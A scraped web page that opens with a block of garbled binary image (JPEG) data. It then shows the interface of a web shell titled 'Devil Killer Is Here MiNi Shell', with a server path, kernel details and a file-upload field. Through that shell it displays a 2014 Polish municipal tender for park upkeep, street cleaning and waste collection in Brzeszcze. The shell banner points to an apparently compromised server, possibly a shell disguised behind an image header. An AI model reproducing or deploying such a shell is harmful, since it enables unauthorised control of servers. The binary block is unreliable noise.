JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141222/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141222/262619-N-2014.html

<p class="kh_header"><b>Brzeszcze: Utrzymanie terenów zieleni, oczyszczanie , odbiór odpadów
w Gminie Brzeszcze w 2015r.</b><br>
<b>Numer ogłoszenia: 262619 - 2014; data zamieszczenia: 22.12.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd  Gminy Brzeszcze , ul. Kościelna 4, 32-620 Brzeszcze, woj. małopolskie, tel. 032 7728500.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.brzeszcze.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Utrzymanie terenów zieleni, oczyszczanie , odbiór odpadów
w Gminie Brzeszcze w 2015r..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia ma być realizowany zgodnie z normami jakościowymi i normami zarządzania środowiskiem PN-EN ISO 9001:2009 oraz PN-EN 14001:2005

Zamawiający zastrzega sobie prawo:
zmniejszenia zakresu o 40% bez możliwości zmiany cen jednostkowych.
Zamiany rodzajów usług w ramach zawartej umowy.


Zakres prac obejmuje utrzymanie:
1.parku przy ul. Dworcowej o powierzchni		  40 750 m2
w tym teren zielony biologicznie czynny do utrzymania	  31 000 m2
powierzchnia wyłączona z utrzymania		    2 825 m2
2.parku przy ul. Kościuszki o powierzchni 		    8 772 m2
w tym teren zielony biologicznie czynny    		    7 230 m2
3.zieleni miejskiej i osiedlowej o powierzchni		159 644 m2
4.zieleni nieurządzonej działek o powierzchni 		190 000 m2
5.poboczy dróg i skarp rowów o powierzchni 		450 000 m2
6.oczyszczanie jezdni o długości		  	  55 000 mb
7.oczyszczanie chodników o powierzchni		  55 000 m2
8.oczyszczanie parkingów o powierzchni		  15 000 m2
9.oczyszczanie ciągów ściekowych o długości		    3 000 mb

Zakres prac i warunki utrzymania  parku  przy ulicy Dworcowej w Brzeszczach 

Na terenie  parku znajdują się : muszla koncertowa, pomnik pamięci ku czci ofiar faszyzmu, łaźnia i latarnia poobozowa, pomnik górników, skatepark, ławki, fontanna, ścieżki rowerowe, tablica z regulaminem  parku, tablice informacyjne, kosze na śmieci, siłownia terenowa.
Z utrzymania wyłączona zostaje fontanna oraz teren łaźni


Zakres  prac obejmuje : 
Utrzymanie w czystości i porządku terenu parku ograniczonego ulicami: Dworcowa, Obozowa a od strony wschodniej granicami z posesjami prywatnymi,  przy następujących zaleceniach:
1.czterokrotnego wykoszenia  traw wraz  z wycięciem odrostów  wokół drzew i odwozem do regionalnej instalacji przetwarzania odpadów komunalnych. Jednorazowe wykoszenie nie może trwać dłużej niż 3 dni. Terminy koszenia należy uzgadniać z zamawiającym.
Podczas koszenia parku wykosić należy również trawniki pomiędzy jezdnią a chodnikiem przy 
ul. Dworcowej - od ronda Pod Górnikiem do skrzyżowania z ul. Łokietka - strona prawa kierunek Pszczyna.
2.dwukrotnego odmłodzenia żywopłotów , polegającego na wycięciu suchych i połamanych gałęzi i przycięciu nożycami z trzech stron do powierzchni ostatniego cięcia. Terminy odmładzania żywopłotów należy uzgadniać 
z zamawiającym.
3.dwukrotnego odmłodzenia krzewów, poprzez wycięcie suchych i połamanych gałęzi oraz przycięciu do nadanej wcześniej formy, do powierzchni ostatniego cięcia Terminy należy uzgadniać 
z zamawiającym.
Wykoszona trawa i wycięte gałęzie nie mogą być składowane w koszach będących wyposażeniem parku i muszą być wywiezione w tym samym dniu, w którym zostały wycięte.
4.Ponadto Zamawiający wymaga ciągłego utrzymania czystości i w należytym stanie urządzeń         
 i terenu całego parku, polegającego na :
1)usuwaniu  wszelkich zanieczyszczeń stałych 2 razy w tygodniu, tj. we wtorki i  piątki 
2)oczyszczaniu alejek , placów , dojść, oraz ścieżki rowerowej z nawierzchni elastycznej z błota,  darni i innych zanieczyszczeń, według potrzeb, w terminach uzgodnionych z zamawiającym.
3)w okresie zimowym - odśnieżaniu i zwalczaniu śliskości piaskiem na alejkach, placach, 
dojściach i schodach terenowych na górce, według potrzeb, w uzgodnieniu z zamawiającym
4)na wiosnę jednokrotnym  i w okresie jesiennym dwukrotnym  usuwaniu opadłych liści. 
Terminy należy uzgodnić z zamawiającym.
5)systematycznym usuwaniu połamanych gałęzi drzew i krzewów
6)trzykrotnym w ciągu sezonu wypieleniu żywopłotów. Terminy należy uzgodnić z zamawiającym.
7)przycinaniu, w razie potrzeby, w celu osiągnięcia skrajni 2,5 m,  gałęzi drzew i krzewów utrudniających poruszanie się alejkami. 
8)systematycznym oczyszczaniu  urządzeń będących wyposażeniem parku tj. ławek, tablicy z regulaminem parku, tablic informacyjnych, skateparku, itp. na bieżąco, w ciągu całego roku.
9)Oczyszczeniu z rdzy i łuszczącej się farby oraz pomalowanie wszystkich ławek farbą ftalową. Kolorystykę i termin należy uzgodnić z zamawiającym,
10)wszelkie powstałe odpady należy niezwłocznie odwozić  do regionalnej instalacji przetwarzania odpadów komunalnych.

Wykonawca zobowiązany jest do każdorazowego zgłaszania do Zamawiającego  zauważonych  zagrożeń dla ludzi i mienia, Wykonawca zobowiązany jest do natychmiastowego usunięcia zagrożenia z jednoczesnym powiadomieniem Zamawiającego lub Policji.


Uwaga : Zaleca się,  aby  Wykonawca zdobył wszelkie informacje niezbędne do sporządzenia oferty np. dokonał wizji  w terenie.  Zaleca się aby  Wykonawca przed sporządzeniem  oferty zapoznał się z aktualnie obowiązującym  Regulaminem  utrzymania czystości i porządku na terenie Gminy Brzeszcze.
UWAGA:
Wykonawca jest zobowiązany do codziennego - do godz. 9:00 składania meldunków 
z wykonanej w poprzedniej dobie pracy - w formie oświadczeń podpisanych przez upoważnionych przedstawicieli wykonawcy
Meldunki z wykonanych prac w dniach ustawowo wolnych od pracy należy dostarczyć 
w pierwszym dniu roboczym do godz. 9:00

Zakres prac i warunki utrzymania  parku  przy ulicy Kościuszki  w Brzeszczach 

na terenie parku znajdują się:   pomnik  pamięci ,  ławki , tablica z regulaminem  parku , tablica informacyjna,  kosze na śmieci, rabaty,  
Zamawiający wymaga wykonywania wszelkich prac ręcznie, z uwagi na obowiązująca gwarancję
Powierzchnia parku : 			8772,00 m2
Powierzchnia chodników : 		  	  896,00 m2
Powierzchnia chodnika z wzmocnioną nawierzchnią: 	  607,00 m2
Powierzchnia zabudowy pod pomnikiem: 		    39,00 m2
Powierzchnia zieleni:				7230,00 m2
Zakres  prac obejmuje : 
Utrzymanie  w czystości i porządku  terenu  parku  ograniczonego ogrodzeniem pomiędzy ulicami : Ofiar Oświęcimia, Kościuszki i Parkową, przy następujących zaleceniach:
1.czterokrotnego wykoszenia  traw wraz  z wycięciem odrostów  wokół drzew i odwozem do regionalnej instalacji przetwarzania odpadów komunalnych. Jednorazowe wykoszenie z wywozem traw nie może trwać dłużej niż 3 dni. Terminy koszenia należy uzgodnić z zamawiającym.
2.dwukrotnego  odmłodzenia krzewów poprzez wycięcie suchych i połamanych gałęzi oraz przycięciu do nadanej wcześniej formy, do powierzchni ostatnich cięć. Terminy należy uzgodnić 
z zamawiającym.
3.wykoszona trawa i wycięte gałęzie nie mogą być składowane w koszach będących wyposażeniem parku i muszą być wywiezione w tym samym dniu, w którym zostały  wycięte.
4.Ponadto  Zamawiający wymaga ciągłego utrzymania czystości i w należytym stanie urządzeń         
i terenu całego parku, polegającego na :
1)usuwaniu  wszelkich zanieczyszczeń stałych w poniedziałki i czwartki
2)oczyszczaniu alejek , placów i dojść z błota,  darni i innych zanieczyszczeń, na bieżąco, w ciągu całego sezonu
3)w okresie zimowym - odśnieżaniu i zwalczaniu śliskości piaskiem na alejkach, placach                i dojściach, według potrzeb, 
4)na wiosnę jednokrotnym  i w okresie jesiennym dwukrotnym  usuwaniu opadłych liści. Terminy należy uzgodnić z zamawiającym.
5)systematycznym usuwaniu połamanych gałęzi drzew i krzewów
6)w razie konieczności przycinaniu,  w celu osiągnięcia skrajni 2,5 m,  gałęzi drzew i krzewów utrudniających poruszanie się alejkami. Terminy należy uzgodnić z zamawiającym.
7)systematycznym oczyszczaniu  urządzeń będących wyposażeniem parku, 
8)dosadzaniu brakujących bylin, podlewaniu ich w miarę potrzeb i nawożeniu
9)zgłaszania do Wydziału Gospodarki Komunalnej Urzędu Gminy w Brzeszczach  zniszczonych urządzeń będących wyposażeniem parku,
10)Wykonawca zobowiązany jest do każdorazowego zgłaszania do Wydziału Gospodarki Komunalnej Urzędu Gminy w Brzeszczach  zauważonych na terenie parku dewastacji lub zdarzenia losowego np. wiatrołomu. W przypadku stwierdzenia powstania zagrożenia dla ludzi i mienia, Wykonawca zobowiązany jest do natychmiastowego usunięcia zagrożenia 
z jednoczesnym powiadomieniem  Zamawiającego lub Policji.
11)Wszelkie powstałe odpady należy w tym samym dniu odwozić do regionalnej instalacji przetwarzania odpadów komunalnych.
Uwaga : Zaleca się,  aby  Wykonawca zdobył wszelkie informacje niezbędne do sporządzenia oferty np. dokonał wizji  w terenie.   
Zaleca się aby  Wykonawca przed sporządzeniem  oferty  zapoznał się z aktualnie obowiązującym Regulaminem  utrzymania czystości i porządku na terenie Gminy  Brzeszcze.           


UWAGA:
Wykonawca ma określić cenę  na podstawie opisu przedmiotu zamówienia 
i doliczyć do powstałej kwoty inne składniki wpływające na ostateczną cenę, np. sadzonki, nawóz, wodę,  dojazd itp.
      
Ponadto w cenie ofertowej należy uwzględnić koszty transportu i składowania odpadów.
UWAGA:
Wykonawca jest zobowiązany do codziennego - do godz. 9:00 składania meldunków 
z wykonanej w poprzedniej dobie pracy - w formie oświadczeń podpisanych przez upoważnionych przedstawicieli wykonawcy
Meldunki z wykonanych prac w dniach ustawowo wolnych od pracy należy dostarczyć 
w pierwszym dniu roboczym do godz. 9:00



      
Utrzymanie   zieleńców , skwerów,  krzewów, rabat żywopłotowych, kwiatowych oraz zieleni przy pomnikach pamięci, której orientacyjna powierzchnia , orientacyjna powierzchnia działek lub sztuki określona jest w wykazach 
przy następujących zaleceniach :

wykaszania  traw wraz  z wycięciem odrostów  wokół drzew. Trawy wykaszane mają według krotności określonych w wykazach . Terminy koszeń należy uzgadniać z zamawiającym,
jednorazowe wykoszenie (z odwozem) traw poza osiedlami nie może trwać dłużej niż pięć dni, a na każdym z osiedli nie dłużej niż jeden tydzień
dwukrotnie w ciągu sezonu odmładzania żywopłotów , polegającego na wycięciu suchych i połamanych gałęzi i przycięciu  nożycami z trzech stron do powierzchni poprzednich cięć Terminy należy uzgodnić z   zamawiajacym
przycinaniu, w razie potrzeby, w celu osiągnięcia skrajni 2,5 m,  gałęzi drzew i krzewów utrudniających poruszanie się alejkami i chodnikami oraz nad parkingami
wykonywaniu zabiegów sanitarnych drzew i krzewów, polegających na usuwaniu z koron połamanych konarów i gałęzi,  
rabaty z krzewami , bylinami i kwiatami   mają być oczyszczane na bieżąco z zanieczyszczeń stałych i chwastów z jednoczesnym spulchnieniem ziemi 
dwukrotnego - w kwietniu i październiku - odmłodzenia krzewów poprzez wycięcie suchych i połamanych gałęzi oraz przycięciu do nadanej wcześniej formy, do powierzchni ostatnich cięć.
dwukrotnej, całkowitej wymianie na nowy - czysty,  piasku w piaskownicach w okresie wiosennym, marzec-maj ( w zależności od pogody) i lipcu-sierpniu, uzupełnianiu na bieżąco ubytków piasku. Terminy wymiany piasku należy uzgadniać z zamawiającym. Napełnienie piaskownic następować będzie po odebraniu przez przedstawiciela zamawiającego  oczyszczenia piaskownic.
Wykonanie, zgodnie z aktualnie obowiązującymi przepisami prawa budowlanego, przez osobę posiadającą uprawnienia budowlane -1 raz w roku przeglądu urządzeń placów zabaw,
utrzymanie w należytym stanie technicznym urządzeń placów zabaw, w tym dokonywanie napraw, wymiany zniszczonych elementów,
oczyszczanie z rdzy i łuszczącej się farby i pomalowanie farbami ftalowymi wszystkich malowanych urządzeń. Kolorystykę i termin wykonania należy uzgodnić z zamawiającym
dwa razy w tygodniu (wtorki i piątki) oczyszczaniu z wszelkich zanieczyszczeń całego terenu, w okresie jesieni również z liści (jednokrotnie na wiosnę i dwukrotnie jesienią ). Terminy oczyszczania terenu z liści należy uzgadniać z zamawiającym.
trzykrotnym w ciągu sezonu wypieleniu żywopłotów . Terminy należy uzgadniać z zamawiającym.                                        
wykoszona trawa , wycięte gałęzie, zebrane nieczystości, zgrabione liście nie mogą być składowane w koszach ulicznych i muszą być wywiezione w tym samym dniu, w którym zostały zebrane.
powstałe w związku z wykonywaniem przedmiotu zamówienia odpady należy umieszczać w regionalnej instalacji przetwarzania odpadów komunalnych.
obsadzenia sadzonkami cynii w ilości 100 szt klombu w kształcie koła przy ul. Ofiar Oświęcimia 
systematycznego  pielenia rabat: żywopłotowych, z krzewami róż , wrzosów i wrzośćców i innych, bylinami i roślinami jednorocznymi,  wymienionych w wykazie
opieki nad rabatami z krzewami róż -ul. Kosynierów tj.  wiosną należy je rozkopczykować krzewy przyciąć, ziemię spulchnić, a rabaty zasilić nawozem odpowiednim dla róż , w okresie późnej jesieni róże należy przyciąć i zakopczykować . Terminy należy uzgadniać z zamawiającym.
         
        W celu osiągnięcia prawidłowej wegetacji,  wszystkie rabaty należy  w miarę potrzeby systematycznie spulchniać, podlewać,  odchwaszczać, usuwać przekwitłe kwiatostany, zasilać nawozami odpowiednimi dla danych roślin . 
Po zakończeniu sezonu wegetacyjnego (październik-listopad) należy usunąć kwiaty jednoroczne, przygotować rabaty do następnego sezonu poprzez przekopanie i zagrabienie.
Wszelkie odpady muszą być w tym samym dniu odwiezione na legalne składowisko odpadów komunalnych.
Zalecana krotność koszenia lub odmładzania żywopłotów lub wymiany piasku oraz zbiór skoszonej trawy określone zostały w wykazie. 
Do wykonania przedmiotu zamówienia Wykonawca użyje własnych materiałów, maszyn, urządzeń oraz zakupi nasiona traw i  kwiatów , nawozy, wodę i inne niezbędne materiały.




Uwaga : Zaleca się,  aby  Wykonawca zdobył wszelkie informacje niezbędne do sporządzenia oferty np. dokonał wizji  w terenie.  Zaleca się aby  Wykonawca przed sporządzeniem  oferty  zapoznał się z aktualnie obowiązującym Regulaminem utrzymania czystości i porządku na terenie Gminy Brzeszcze.

UWAGA:
Wykonawca jest zobowiązany do codziennego - do godz. 900 składania meldunków 
z wykonanej w poprzedniej dobie pracy - w formie oświadczeń podpisanych przez upoważnionych przedstawicieli wykonawcy
Meldunki z wykonanych prac w dniach ustawowo wolnych od pracy należy dostarczyć 
w pierwszym dniu roboczym do godz. 900

Wykaszanie terenów zieleni nieurządzonej /działek/

wykaszanie działek będących własnością Gminy Brzeszcze
przy spełnieniu następujących warunków:

wykoszenia  traw i samosiewów na działkach oraz usuwania wszelkich zanieczyszczeń stałych     
z koszonego terenu wraz z odwozem do regionalnej instalacji przetwarzania odpadów komunalnych. Termin koszenia poszczególnych działek należy uzgodnić z przedstawicielem Zamawiającego.
Orientacyjna powierzchnia działek, krotności koszenia, zbiór pokosu  określone są w wykazie  stanowiącym załącznik Nr 9                                   
1.pokos musi być wywieziony w tym samym dniu, w którym został wycięty, zanieczyszczenia stałe - tym samym dniu w którym zostały zebrane
2.oczyszczania ciągów ściekowych na terenie zrekultywowanego składowiska odpadów komunalnych (działka nr 1120/15  w Brzeszczach)



Zaleca się aby  Wykonawca przed sporządzeniem  ofert  zdobył wszelkie informacje niezbedne do sporządzenia oferty np. dokonał wizji w terenie oraz zapoznał się 
z aktualnie obowiązującym Regulaminem  utrzymania czystości i porządku na terenie Gminy Brzeszcze. 	
        
UWAGA:
Wykonawca jest zobowiązany do codziennego - do godz. 900 składania meldunków 
z wykonanej w poprzednim dniu pracy  - w formie oświadczeń podpisanych przez upoważnionych przedstawicieli wykonawcy
Meldunki z wykonanych prac w dniach ustawowo wolnych od pracy należy dostarczyć 
w pierwszym dniu roboczym do godz. 900



         Wykaszanie poboczy dróg i rowów

 Przedmiot zamówienia obejmuje wykonanie w trakcie trwania umowy następujące prace:
1.wykoszenie na łącznej powierzchni 450 tys. m2  traw, samosiewów i odrostów  drzew wraz ze zbiorem pokosu i odwozem z wykoszonych z poszczególnych odcinków w tym samym dniu na legalne składowisko odpadów komunalnych lub zagospodarowanie we własnym zakresie.   Dopuszcza się wykaszanie z mulczowaniem,
2.W wykoszonym w danym dniu odcinku poboczy i rowu muszą być odsłonięte /obkoszone/ słupki znaków i innych urządzeń,
3.oczyszczanie w trakcie koszenia poboczy oraz  rowów przydrożnych z zanieczyszczeń  stałych i odwóz w tym samym dniu do regionalnej instalacji przetwarzania odpadów komunalnych. 
Zamawiający każdorazowo określi zakres i termin wykonania prac. Odbiór odbywał się będzie w ciągu 3 dni po zgłoszeniu do odbioru wykonanego zakresu . Do obowiązku Wykonawcy należy również  każdorazowe zgłaszanie Zamawiającemu zauważonych uszkodzonych urządzeń bezpieczeństwa ruchu w wykonywanym zakresie. Przed złożeniem oferty Wykonawca powinien dokonać oględzin dróg gminnych,  celem dokładnego zapoznania się z warunkami terenowymi oraz innymi istotnymi z punktu widzenia oferenta uwarunkowaniami, aby wyeliminować ewentualne rozbieżności, bądź wątpliwości.

UWAGA:
Wykonawca jest zobowiązany do codziennego - do godz. 900 składania meldunków 
z wykonanej w poprzednim dniu pracy - w formie oświadczeń podpisanych przez upoważnionych przedstawicieli wykonawcy
Meldunki z wykonanych prac w dniach ustawowo wolnych od pracy należy dostarczyć 
w pierwszym dniu roboczym do godz. 900


Oczyszczanie -
Oczyszczanie jezdni dróg, chodników, placów i parkingów położonych na terenie Gminy Brzeszcze
 wraz z wywozem do regionalnej instalacji przetwarzania odpadów komunalnych zabrudzeń wynikłych z bieżącej eksploatacji oraz zdarzeń losowych. 
Oczyszczanie  przyulicznych ciągów ściekowych położonych na terenie Gminy Brzeszcze 
Odchwaszczanie jezdni, chodników i parkingów wraz z oczyszczaniem.
Odwóz w tym samym   dniu do regionalnej instalacji przetwarzania odpadów komunalnych. 
Przez oczyszczanie rozumie się zamiatanie i zbieranie wszelkich nieczystości stałych: tj .papierów, niedopałków papierosów, opakowań papierowych, szklanych, foliowych, metalowych, szmat, drewna 
i gałęzi, porzuconych worków ze śmieciami, piasku, lub zalegającej ziemi, liści, kwiatów i owoców opadłych z drzew i krzewów, odchodów zwierzęcych i odwóz w tym samym dniu zebranych nieczystości na legalne składowisko odpadów komunalnych.
W miejscach, gdzie nie ma możliwości oczyszczania mechanicznego należy wykonać tę usługę ręcznie.
Przez odchwaszczanie należy rozumieć usuwanie wszelkich roślin wyrastających w spoinach i pęknięciach elementów nawierzchni.
Mechaniczne oczyszczanie ma być wykonywane w godzinach 600 - 1800. 
Roboty będą wykonywane w terminie od podpisania umowy do 31 października 2014r.
Zamawiający wymaga takiej organizacji pracy, aby w ciągu jednego dnia w godz. od 600 do 1800 oczyścić nawierzchnie jezdni, chodników i placów o łącznej powierzchni nie mniejszej niż 30 000m2
Zamawiający z dwudniowym wyprzedzeniem wskaże telefonicznie, bądź mailem terminy i zakresy prac do wykonania.
W przypadku robót wymienionych w załączniku cenowym w poz. od 3 do 7 zamawiający wymaga dokumentacji zdjęciowej przed i po wykonaniu usług z aktualnymi datami.
Wykonawca ma określić cenę  na podstawie  opisu przedmiotu zamówienia wypełniając formularz cenowy W cenie należy dodatkowo uwzględnić:
-koszty składowania odpadów z czyszczenia
-koszty dojazdu do miejsca wykonywania prac
-koszty związane z zabezpieczeniem terenu robót przed dostępem osób trzecich
-koszty zabezpieczenia robót pod względem BHP
-koszty zużytej wody
-inne koszty, które zdaniem Wykonawcy są niezbędne do poniesienia np. prac wykonywanych                  w godzinach popołudniowych 
Wykonawca określi ceny jednostkowe na wszelkie roboty wymienione w formularzu cenowym. 

Cenę oferty dla całości zadania stanowić będzie suma iloczynów jednostek i ceny jednostkowej 
w zaokrągleniu do setnych części powiększoną o należny podatek VAT.
Cena ta będzie brana pod uwagę w trakcie wyboru najkorzystniejszej oferty.
Zamawiający zastrzega sobie prawo zamiany oraz zmniejszenia zakresu usług przewidzianych do wykonania zamówienia do 40%. Zmniejszenie to nie spowoduje zmiany cen jednostkowych   za wykonanie poszczególnych rodzajów usług  i nie będzie podlegać waloryzacji z wyjątkiem ustawowej zmiany stawki podatku VAT 
Zakłada się, że Wykonawca zdobył wszelkie informacje potrzebne do wykonania przedmiotu zamówienia 
i uwzględnił je w oferowanej cenie.
 Cena oferty obejmująca podatek od towarów i usług (VAT) musi być wyrażona w złotych z zaokrągleniem do dwóch miejsc po przecinku (grosze). Stawka VAT musi być określana zgodnie z ustawą z 11 marca 2004 r. 
o podatku od towarów i usług (Dz. U. Nr 54, poz. 535).
 Dla porównania ofert zamawiający przyjmie cenę brutto obejmującą podatek od towarów i usług (VAT).

UWAGA:
Wykonawca jest zobowiązany do codziennego - do godz. 900 składania meldunków 
z wykonanej w poprzednim dniu pracy - w formie oświadczeń podpisanych przez upoważnionych przedstawicieli wykonawcy
Meldunki z wykonanych prac w dniach ustawowo wolnych od pracy należy dostarczyć 
w pierwszym dniu roboczym do godz. 900


Odbiór odpadów komunalnych:
1.Odbiór odpadów  komunalnych:
a)odbiór niesegregowanych (zmieszanych) odpadów o kodzie 20 03 01 z pojemników o pojemności 0,05 m3   - 158 szt., o pojemności 0,035 m3  - 39 szt. (stanowiących własność Gminy Brzeszcze)  i o pojemności 1,1 m3 - 4 szt. zamykanych na klucz (dzierżawa) z częstotliwością uniemożliwiającą przepełnienie pojemników, nie rzadziej niż określoną w wykazie nr 11,
b)odbiór odpadów zgromadzonych w w/w pojemnikach podczas imprez organizowanych w miejscach publicznych,
c)każdorazową wymianę worka foliowego w pojemnikach na psie odchody,
d)utrzymanie w czystości i porządku pojemników (co najmniej jeden raz w ciągu roku mycie ich),
e)utrzymanie w czystości i porządku terenu wokół pojemników w promieniu ok. 5 m,
f)zgłaszanie zamawiającemu uszkodzeń, kradzieży pojemników, zmiany miejsca ich ustawienia oraz wszelkich nieprawidłowości związanych z wykonaniem przedmiotu zamówienia.
2.dzierżawę 4 szt. pojemników o poj. 1,1 m3 każdy. 


Wykaz ilości pojemników, ilości odpadów, lokalizacji i częstotliwości odbierania odpadów - zawarty jest w dodatku nr 11

Mycie wiat
trzykrotne  (raz na 4 miesiące) oczyszczanie 42 szt. szklanych wiat przystankowych oraz słupków przystankowych z zabrudzeń wynikłych z bieżącej eksploatacji, graffiti, plakatów i innych napisów - wymienionych w dodatku nr 12

Sprzątanie przystanków autobusowych

1.oczyszczanie przystanków,  w tym każdorazowe opróżnianie koszy przystankowych 
2.w okresie zimowym - odśnieżanie przystanku, oraz posypywanie środkami do zapobiegania oraz zwalczania śliskości

Ilość przystanków, powierzchnia oraz częstotliwość oczyszczania - wymieniona jest w dodatku nr 13

Ponadto w cenie ofertowej należy uwzględnić koszty transportu i składowania odpadów w regionalnej instalacji przetwarzania odpadów komunalnych oraz opłatę za korzystanie ze środowiska..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 77.31.30.00-7, 90.62.00.00-9, 90.61.00.00-6, 90.51.10.00-2, 90.91.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2015.</p>
